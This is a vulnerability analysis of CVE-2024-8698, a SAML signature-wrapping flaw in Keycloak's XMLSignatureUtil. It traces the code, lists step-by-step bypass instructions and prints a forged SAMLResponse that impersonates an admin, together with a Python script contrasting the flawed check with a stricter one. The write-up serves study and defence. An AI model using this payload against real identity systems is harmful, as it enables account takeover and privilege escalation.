Summary:
The SAML signature validation method in Keycloak's XMLSignatureUtil class is flawed. It decides whether a SAML signature covers the whole document or only a particular assertion from where the signature sits in the XML document, rather than from the Reference element that designates the signed element. This lets an attacker craft a response that bypasses validation, which can lead to privilege escalation or impersonation.
Patch analysis:
The fix for the vulnerability is in this commit:
https://github.com/keycloak/keycloak/commit/ae6a686870b57182c0635ae60f0fe81d57cf15e3
Reading the advisory and the commit, we see that the vulnerability lies in the validate function of the XMLSignatureUtil class: it mistakes an assertion's signature for a signature over the whole document, which lets an attacker escalate privileges.
Setup and debugging:
Download
https://github.com/keycloak/keycloak/releases/download/25.0.5/keycloak-25.0.5.zip
Extract the archive, then run:
.\bin\kc.bat start-dev --debug 8989
Next, import the Keycloak lib directory into IntelliJ IDEA and attach a remote debugger on port 8989.
=> Debug setup complete
Keycloak basics:
Keycloak is an open-source identity provider and access management solution for modern applications and services. It manages identities and access to applications and services, acts as a single sign-on (SSO) service for many applications, and supports protocols such as OAuth 2.0, OpenID Connect and SAML 2.0.
For SAML 2.0 the basic flow is:
User A wants to log in to a GitLab application (the service provider), so user A must log in through Keycloak (the identity provider). On successful login, Keycloak sends a SAML response to GitLab; GitLab validates the SAML response and, if it checks out, lets the user use the application.
Tracing back from the patched function, we find the entry point in the class:
org.keycloak.broker.saml.SAMLEndpoint
This class implements identity brokering. What is an identity broker?
An identity broker is a service that lets users access other applications and services with credentials from an external identity provider.
Put simply, identity brokering lets you log in to your Keycloak using another IdP (for example Facebook, Google, ...).
Now set up another identity provider to exercise Keycloak's broker feature. Here I use WordPress, turned into an identity provider with a WordPress IdP plugin.
Code analysis:
The response is processed in the handleSamlResponse function:
Call trace:
→ SamlProtocolUtils.verifyDocumentSignature → SAML2Signature.validate → XMLSignatureUtil.validate
The logic of this function is as follows:
First it collects all Signature elements, then loops over each node. For each node it checks whether the node's parent is an Assertion and, if so, increments the signedAssertions counter. Each node in the loop is then run through the validateSingleNode() function.
The logic of validateSingleNode is simple: it verifies that one signature node. Back in validate, after the loop ends it reaches the condition: if the number of signed assertions differs from the total number of assertions, return false (a malicious assertion has been detected).
After successful validation, control passes to the handleLoginResponse function.
Set a breakpoint at the start of the function and jump straight to line 624:
If all three of the following conditions are false, this function populates the attributes from the received response:
- Condition 1: the configuration requires WantAssertionsSigned = true (default false) and the variable signed = false
- Condition 2: the variable signed = true, the configuration has signature validation enabled (the default) and AssertionUtil.isSignatureValid() returns false
- Condition 3: the variable signed = false, signature validation is enabled (the default) and containsUnencryptedSignature() (which checks whether the response document contains a Signature element) returns false
The signed variable is true if the assertion contains a Signature element, otherwise false.
Once the conditions are satisfied, the attributes are set from the first assertion:
So the program flow can be summarised as:
Step 1: the program receives the SAMLResponse from the broker
Step 2: every signature present in the document is verified
Step 3: three conditions are checked: assertionSignatureNotExistsWhenRequired, signatureNotValid, hasNoSignatureWhenRequired. If all three are false, the first assertion that appears is used.
Confirmation
The flaw lies in the logic of the validate function. XMLSignatureUtil.validate() collects all signatures in the response document and then verifies each of them. The verification procedure in XMLSignatureUtil.validateUsingKeySelector() is defined in section 3.2 of https://www.w3.org/TR/xmldsig-core1/#sec-CoreValidation
Core validation consists of two parts. Part 1 verifies the SignatureValue with the public key; part 2 verifies each Reference, i.e. checks its DigestValue.
For example:
<?xml version="1.0" encoding="utf-8"?>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="addf4d01a0076b2fa36278805129ac8e5a46d04c9" Version="2.0" IssueInstant="2024-10-10T08:53:59Z" Destination="http://127.0.0.1:8080/realms/master/broker/saml/endpoint" InResponseTo="ID_b2df2d79-a443-4f59-9c53-43fce49f8141">
<saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://localhost/wordpress/wp-content/plugins/miniorange-wp-as-saml-idp/</saml:Issuer>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="a11a434527ab2de06ea8262a23e93166710c88f65" IssueInstant="2024-10-10T08:53:59Z" Version="2.0">
<saml:Issuer>http://localhost/wordpress/wp-content/plugins/miniorange-wp-as-saml-idp/</saml:Issuer>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
<ds:Reference URI="#a11a434527ab2de06ea8262a23e93166710c88f65">
<ds:Transforms>
<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
</ds:Transforms>
<ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
<ds:DigestValue>OrrB2CQGFegn8NFOmsGJjv1wUPIKd+3OvJoX8PMUtlw=</ds:DigestValue>
</ds:Reference>
</ds:SignedInfo>
<ds:SignatureValue>wY8pHpcQaHJwodifZG0Qx4gmYYOOXiGGHohXFDiPGK9WQY3dOWXD2IQOu14LouFN7jnKvgqdFU5q93Hd8ae67KPoVCJkZvQ3E3WlS1T66CHGhvE4UT6oS3BCRKcB2FMvUBbngPiI6f2H/wGKGAQ6KMqEx9i4+GWRjFTyAIYUxJXcYTGv/JILyLEkotx1crdSpRZLSyOkyFBkPj3TvyQfqRp21Li042tVzb2+H0Nj1nQek5KznqDKrOdLr0Du+INWj3mcpQNIuEzJthvdwYmQ0aDi0JZOuyjUbH/pYVQcmi2vHASBBi815k9TOZ1zrYOuDDBK2cqnoSpg5VPVjdiGZw==</ds:SignatureValue>
<ds:KeyInfo>
<ds:X509Data>
<ds:X509Certificate>...</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</ds:Signature>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">admin@abc.co</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData NotOnOrAfter="2024-10-10T08:58:59Z" Recipient="http://127.0.0.1:8080/realms/master/broker/saml/endpoint" InResponseTo="ID_b2df2d79-a443-4f59-9c53-43fce49f8141"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2024-10-10T08:53:29Z" NotOnOrAfter="2024-10-10T08:58:59Z">
<saml:AudienceRestriction>
<saml:Audience>http://127.0.0.1:8080/realms/master</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2024-10-10T08:51:59Z" SessionIndex="_a28268d14233fd60612afedd1c3d6f6" SessionNotOnOrAfter="2024-10-10T16:53:59Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
</samlp:Response>
Signature verification first locates the signed data, i.e. the data referenced by the Reference URI, here the element with ID a11a434527ab2de06ea8262a23e93166710c88f65. That data then goes through the Transform steps and is hashed with SHA-256; the result is compared with the hash recovered from the SignatureValue using the public key.
Reference validation likewise dereferences the Reference URI and compares the two SHA-256 hashes.
At this point, if we place that same signature on the whole response, the code above cannot tell whether the signature belongs to the response or to the assertion: it still verifies using the data fetched via the URI, so this part of the validation is bypassed.
The next condition in the validate function:
The application checks whether the number of signed assertions equals the number of assertions in the document.
This condition can be bypassed in two ways: method 1 is to sign no assertion at all; method 2 is to create a fake assertion and sign it yourself. Method 2 is of course impossible without the private key. Method 1 means removing every signature from the assertion part.
Handling the login response
Continuing into the handleLoginResponse function, we need to get past 3 conditions for a complete bypass.
First, signed is assigned the return value of AssertionUtil.isSignedElement(). That function searches the current assertion for a Signature element. In our flow we have removed every signature from the assertion, so signed = false.
- Condition 1: SAMLEndpoint.this.config.isWantAssertionsSigned() defaults to false, so condition 1 is always false
- Condition 2: signed is currently false, so the whole expression is false (in an AND, one false operand makes the result false)
- Condition 3: the first two operands are true; the function containsUnencryptedSignature() checks whether the whole document contains a signature. In our flow we moved the signature from the assertion into the response, so the function returns true => condition 3 is also false
Next, once these conditions pass, the application takes the first assertion and assigns the attributes from it.
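The distinction that runs through the analysis above (the validate() loop that counts signed assertions by their parent, and the three handleLoginResponse conditions that hinge on a position-based signed flag) can be made concrete with a structural check. The following is an added example written for this page, not Keycloak's code and not the author's: it parses two constructed, shortened versions of the original and malicious responses shown on this page, resolves each ds:Signature's Reference URI, and contrasts the position-based reading with a Reference-based one. The names inspect, flawed_decision and hardened_decision are this example's own; the assumption that the signed-assertion count check is skipped when no assertion is signed follows bypass method 1 as described above and is labelled in the code; cryptographic verification (C14N, digests, RSA) is not modelled.

```python
"""Which element does each SAML ds:Signature actually cover?

Added example, not Keycloak's code. Contrasts deciding by the signature's
position in the tree (the flawed logic described on this page) with deciding
by resolving the Reference URI. XML-DSig cryptography is not modelled; only
structure is examined. Both sample documents are constructed, shortened
versions of the responses shown on this page.
"""
import xml.etree.ElementTree as ET

DS = "{http://www.w3.org/2000/09/xmldsig#}"
SAML = "{urn:oasis:names:tc:SAML:2.0:assertion}"
ASSERTION = SAML + "Assertion"
NS = ('xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
      'xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" '
      'xmlns:ds="http://www.w3.org/2000/09/xmldsig#"')
# Signature stub: only the Reference matters for this structural check.
SIG = ('<ds:Signature><ds:SignedInfo>'
       '<ds:Reference URI="#a11a434527ab2de06ea8262a23e93166710c88f65"/>'
       '</ds:SignedInfo><ds:SignatureValue>c2lnLi4u</ds:SignatureValue></ds:Signature>')

# Original shape: the signature is enveloped in the assertion it references.
ORIGINAL = f"""<samlp:Response {NS} ID="resp1" Version="2.0">
  <saml:Assertion ID="a11a434527ab2de06ea8262a23e93166710c88f65" Version="2.0">
    {SIG}<saml:Subject><saml:NameID>test@abc.co</saml:NameID></saml:Subject>
  </saml:Assertion>
</samlp:Response>"""

# Malicious shape: an unsigned assertion for another user comes first and the
# signature has been moved to Response level, still referencing the old assertion.
MALICIOUS = f"""<samlp:Response {NS} ID="resp1" Version="2.0">
  <saml:Assertion ID="_lpe" Version="2.0">
    <saml:Subject><saml:NameID>admin@abc.co</saml:NameID></saml:Subject>
  </saml:Assertion>
  <saml:Assertion ID="a11a434527ab2de06ea8262a23e93166710c88f65" Version="2.0">
    <saml:Subject><saml:NameID>test@abc.co</saml:NameID></saml:Subject>
  </saml:Assertion>
  {SIG}
</samlp:Response>"""


def referenced_element(sig, root):
    """Resolve the signature's same-document Reference URI ("#id") to the element it names."""
    ref = sig.find(f"{DS}SignedInfo/{DS}Reference")
    uri = ref.get("URI", "") if ref is not None else ""
    if not uri.startswith("#"):
        return None
    return next((el for el in root.iter() if el.get("ID") == uri[1:]), None)


def inspect(xml_text):
    """Report what position-based and Reference-based logic say each signature covers."""
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    assertions = list(root.iter(ASSERTION))
    report = {"response": root.get("ID"), "assertions": [a.get("ID") for a in assertions],
              "first_nameid": assertions[0].findtext(f"{SAML}Subject/{SAML}NameID") if assertions else None,
              "signatures": []}
    for sig in root.iter(f"{DS}Signature"):
        parent, target = parents[sig], referenced_element(sig, root)
        report["signatures"].append({
            # Flawed rule: parent is an Assertion => assertion signature, else document signature.
            "by_position": parent.get("ID") if parent.tag == ASSERTION else "document",
            # Reference rule: the URI decides, and an enveloped signature must sit inside the
            # very element it references; a signature placed anywhere else covers nothing.
            "by_reference": target.get("ID") if target is not None and target is parent else None})
    return report


def flawed_decision(report, want_assertions_signed=False, validate_signature=True):
    """Acceptance as this page describes it, with the page's default settings.
    Assumption: the 'signed assertions == all assertions' check only applies when at least
    one assertion carries an enveloped signature, which is what bypass method 1 relies on."""
    if not report["assertions"]:
        return False
    sigs = report["signatures"]
    signed_by_position = [s["by_position"] for s in sigs if s["by_position"] != "document"]
    if signed_by_position and len(signed_by_position) != len(report["assertions"]):
        return False                                            # XMLSignatureUtil.validate count check
    signed = report["assertions"][0] in signed_by_position      # AssertionUtil.isSignedElement()
    sig_invalid = False                                         # cryptographic check not modelled
    cond1 = want_assertions_signed and not signed               # assertionSignatureNotExistsWhenRequired
    cond2 = signed and validate_signature and sig_invalid       # signatureNotValid
    cond3 = not signed and validate_signature and not sigs      # hasNoSignatureWhenRequired
    return not (cond1 or cond2 or cond3)


def hardened_decision(report):
    """Editor's Reference-based rule (not Keycloak's patch): every assertion must be covered
    by a signature that references it, or the Response element itself must be signed."""
    covered = {s["by_reference"] for s in report["signatures"]}
    if report["response"] in covered:
        return True
    return bool(report["assertions"]) and all(a in covered for a in report["assertions"])


if __name__ == "__main__":
    for name, doc in (("original", ORIGINAL), ("malicious", MALICIOUS)):
        rep = inspect(doc)
        print(f"{name}: first NameID={rep['first_nameid']} "
              f"flawed={flawed_decision(rep)} hardened={hardened_decision(rep)}")
```

For the malicious document, the flawed logic accepts and would build the session from the first assertion (admin@abc.co), while the hardened rule rejects because neither assertion is covered by a signature whose Reference points at it. Calling flawed_decision(rep, want_assertions_signed=True) shows the configuration-side mitigation the page mentions: with WantAssertionsSigned enabled, the unsigned first assertion trips condition 1 and the response is refused even under the flawed logic.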
So the bypass idea is as follows:
Step 1: you need a low-privilege account and an intercepting proxy to capture the request and extract the SAMLResponse from it
Step 2: move the assertion's signature into the Response element, delete the signature from the assertion, then duplicate the assertion, insert the copy above it and change its email to the admin's
Step 3: resend the SAML request
For example:
Original SAMLResponse:
<?xml version="1.0" encoding="utf-8"?>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="addf4d01a0076b2fa36278805129ac8e5a46d04c9" Version="2.0" IssueInstant="2024-10-10T08:53:59Z" Destination="http://127.0.0.1:8080/realms/master/broker/saml/endpoint" InResponseTo="ID_b2df2d79-a443-4f59-9c53-43fce49f8141">
<saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://localhost/wordpress/wp-content/plugins/miniorange-wp-as-saml-idp/</saml:Issuer>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="a11a434527ab2de06ea8262a23e93166710c88f65" IssueInstant="2024-10-10T08:53:59Z" Version="2.0">
<saml:Issuer>http://localhost/wordpress/wp-content/plugins/miniorange-wp-as-saml-idp/</saml:Issuer>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
<ds:Reference URI="#a11a434527ab2de06ea8262a23e93166710c88f65">
<ds:Transforms>
<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
</ds:Transforms>
<ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
<ds:DigestValue>OrrB2CQGFegn8NFOmsGJjv1wUPIKd+3OvJoX8PMUtlw=</ds:DigestValue>
</ds:Reference>
</ds:SignedInfo>
<ds:SignatureValue>wY8pHpcQaHJwodifZG0Qx4gmYYOOXiGGHohXFDiPGK9WQY3dOWXD2IQOu14LouFN7jnKvgqdFU5q93Hd8ae67KPoVCJkZvQ3E3WlS1T66CHGhvE4UT6oS3BCRKcB2FMvUBbngPiI6f2H/wGKGAQ6KMqEx9i4+GWRjFTyAIYUxJXcYTGv/JILyLEkotx1crdSpRZLSyOkyFBkPj3TvyQfqRp21Li042tVzb2+H0Nj1nQek5KznqDKrOdLr0Du+INWj3mcpQNIuEzJthvdwYmQ0aDi0JZOuyjUbH/pYVQcmi2vHASBBi815k9TOZ1zrYOuDDBK2cqnoSpg5VPVjdiGZw==</ds:SignatureValue>
<ds:KeyInfo>
<ds:X509Data>
<ds:X509Certificate>MIIElTCCA32gAwIBAgIUG9ZkPUYwnNJ9yXXYBrtasp/99HowDQYJKoZIhvcNAQELBQAwgbMxFzAVBgNVBAMMDm1pbmlvcmFuZ2UuY29tMRUwEwYDVQQDDAx4ZWN1cmlmeS5jb20xCzAJBgNVBAYTAlVTMRAwDgYDVQQIDAdXeW9taW5nMREwDwYDVQQHDAhDaGV5ZW5uZTEtMCsGA1UECgwkbWluaU9yYW5nZSBTZWN1cml0eSBTb2Z0d2FyZSBQdnQgTHRkMSAwHgYJKoZIhvcNAQkBFhFpbmZvQHhlY3VyaWZ5LmNvbTAeFw0yMzExMjQxMDM4MTNaFw0yNTAxMTcxMDM4MTNaMIGzMRcwFQYDVQQDDA5taW5pb3JhbmdlLmNvbTEVMBMGA1UEAwwMeGVjdXJpZnkuY29tMQswCQYDVQQGEwJVUzEQMA4GA1UECAwHV3lvbWluZzERMA8GA1UEBwwIQ2hleWVubmUxLTArBgNVBAoMJG1pbmlPcmFuZ2UgU2VjdXJpdHkgU29mdHdhcmUgUHZ0IEx0ZDEgMB4GCSqGSIb3DQEJARYRaW5mb0B4ZWN1cmlmeS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDeT2P3tJpOYcjbrXt6xRnxwbFD1GouFM8nMbkEyGxjEP2OHNHhbXI0hSXaOgbpUBW9sGTPPWNGK3avDclvK6pQIMeyk272DIq+IG0aFN8PrlxpPQQClxwdpt0YWDBpWO31dFsTuUukUWlQwbzu3Z/2DN7b8R9KKPhDlb3RYKTznD9zPU5nrpG4qtNbMAjPCOrgmjMEByRsnHnAWupNE15bzSDF0YISl6LGgpDe+MQo2VpyZyxH/NUEs4LvDAiM0AZwawe2FzyPVm3Z/SIp7Eer5L3F4OfHZ89J6Dm3DYH4WtnhqN74bU/OWGyNZ+kbFRoo6Gr9ZvHbHWl9w8HZIcgbAgMBAAGjgZ4wgZswHQYDVR0OBBYEFB7iZs2DOlek7jPH5YrEGOTjujWmMB8GA1UdIwQYMBaAFB7iZs2DOlek7jPH5YrEGOTjujWmMA4GA1UdDwEB/wQEAwIFoDAgBgNVHSUBAf8EFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwJwYDVR0RBCAwHoIObWluaW9yYW5nZS5jb22CDHhlY3VyaWZ5LmNvbTANBgkqhkiG9w0BAQsFAAOCAQEAm6v4wqLtMS1myybOiBLt79hJvJPumVnWthKFWGO2/mDMXMBS1X8dVK8h2Yn220xq8DTbIDxJW019iOmA7uEpdHNjyqtiRUTsEcBBdeRcSu1qS6IHtzlPdhFBWjbKx8u7Skv17ILhz5oW8yCjttueVvwVin0WUwQRM4Qn63QspmzK9K57w6AHzSs8z3eo9kUCgsd90VePGloZG0ZZ3WVnA3L1v6wS5dbbe6nF4Q7sji/y8+mzFmDBmn2FSFk755R+pV/1SXporU9S8f/t1goP3VPw0up6dQefRuHWZjjq1qaV4v5yLUhz/dsQ8dhuERRrHaJ41Ftq8DL363kbDZ48qg==</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</ds:Signature>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">test@abc.co</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData NotOnOrAfter="2024-10-10T08:58:59Z" Recipient="http://127.0.0.1:8080/realms/master/broker/saml/endpoint" InResponseTo="ID_b2df2d79-a443-4f59-9c53-43fce49f8141"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2024-10-10T08:53:29Z" NotOnOrAfter="2024-10-10T08:58:59Z">
<saml:AudienceRestriction>
<saml:Audience>http://127.0.0.1:8080/realms/master</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2024-10-10T08:51:59Z" SessionIndex="_a28268d14233fd60612afedd1c3d6f6" SessionNotOnOrAfter="2024-10-10T16:53:59Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
</samlp:Response>
Malicious SAMLResponse:
<?xml version="1.0" encoding="utf-8" standalone="no"?>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" Destination="http://127.0.0.1:8080/realms/master/broker/saml/endpoint" ID="addf4d01a0076b2fa36278805129ac8e5a46d04c9" InResponseTo="ID_b2df2d79-a443-4f59-9c53-43fce49f8141" IssueInstant="2024-10-10T08:53:59Z" Version="2.0">
<saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://localhost/wordpress/wp-content/plugins/miniorange-wp-as-saml-idp/</saml:Issuer>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_lpe" IssueInstant="2024-10-10T08:53:59Z" Version="2.0">
<saml:Issuer>http://localhost/wordpress/wp-content/plugins/miniorange-wp-as-saml-idp/</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">admin@abc.co</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData InResponseTo="ID_b2df2d79-a443-4f59-9c53-43fce49f8141" NotOnOrAfter="2024-10-10T08:58:59Z" Recipient="http://127.0.0.1:8080/realms/master/broker/saml/endpoint"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2024-10-10T08:53:29Z" NotOnOrAfter="2024-10-10T08:58:59Z">
<saml:AudienceRestriction>
<saml:Audience>http://127.0.0.1:8080/realms/master</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2024-10-10T08:51:59Z" SessionIndex="_a28268d14233fd60612afedd1c3d6f6" SessionNotOnOrAfter="2024-10-10T16:53:59Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="a11a434527ab2de06ea8262a23e93166710c88f65" IssueInstant="2024-10-10T08:53:59Z" Version="2.0">
<saml:Issuer>http://localhost/wordpress/wp-content/plugins/miniorange-wp-as-saml-idp/</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">test@abc.co</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData InResponseTo="ID_b2df2d79-a443-4f59-9c53-43fce49f8141" NotOnOrAfter="2024-10-10T08:58:59Z" Recipient="http://127.0.0.1:8080/realms/master/broker/saml/endpoint"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2024-10-10T08:53:29Z" NotOnOrAfter="2024-10-10T08:58:59Z">
<saml:AudienceRestriction>
<saml:Audience>http://127.0.0.1:8080/realms/master</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2024-10-10T08:51:59Z" SessionIndex="_a28268d14233fd60612afedd1c3d6f6" SessionNotOnOrAfter="2024-10-10T16:53:59Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
<ds:Reference URI="#a11a434527ab2de06ea8262a23e93166710c88f65">
<ds:Transforms>
<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
</ds:Transforms>
<ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
<ds:DigestValue>OrrB2CQGFegn8NFOmsGJjv1wUPIKd+3OvJoX8PMUtlw=</ds:DigestValue>
</ds:Reference>
</ds:SignedInfo>
<ds:SignatureValue>wY8pHpcQaHJwodifZG0Qx4gmYYOOXiGGHohXFDiPGK9WQY3dOWXD2IQOu14LouFN7jnKvgqdFU5q93Hd8ae67KPoVCJkZvQ3E3WlS1T66CHGhvE4UT6oS3BCRKcB2FMvUBbngPiI6f2H/wGKGAQ6KMqEx9i4+GWRjFTyAIYUxJXcYTGv/JILyLEkotx1crdSpRZLSyOkyFBkPj3TvyQfqRp21Li042tVzb2+H0Nj1nQek5KznqDKrOdLr0Du+INWj3mcpQNIuEzJthvdwYmQ0aDi0JZOuyjUbH/pYVQcmi2vHASBBi815k9TOZ1zrYOuDDBK2cqnoSpg5VPVjdiGZw==</ds:SignatureValue>
<ds:KeyInfo>
<ds:X509Data>
<ds:X509Certificate>...</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</ds:Signature>
</samlp:Response>
POC
https://github.com/huydoppaz/CVE-2024-8698-POC
References
https://viblo.asia/p/saml-hacking-phan-2-xml-signatures-38X4EPGgVN2
https://www.w3.org/TR/xmldsig-core1/#sec-CoreValidation
https://github.com/keycloak/keycloak/issues/33116
https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/
Originally published on the WeChat public account Ots安全: CVE-2024-8698: Improper SAML response validation leads to privilege escalation in Keycloak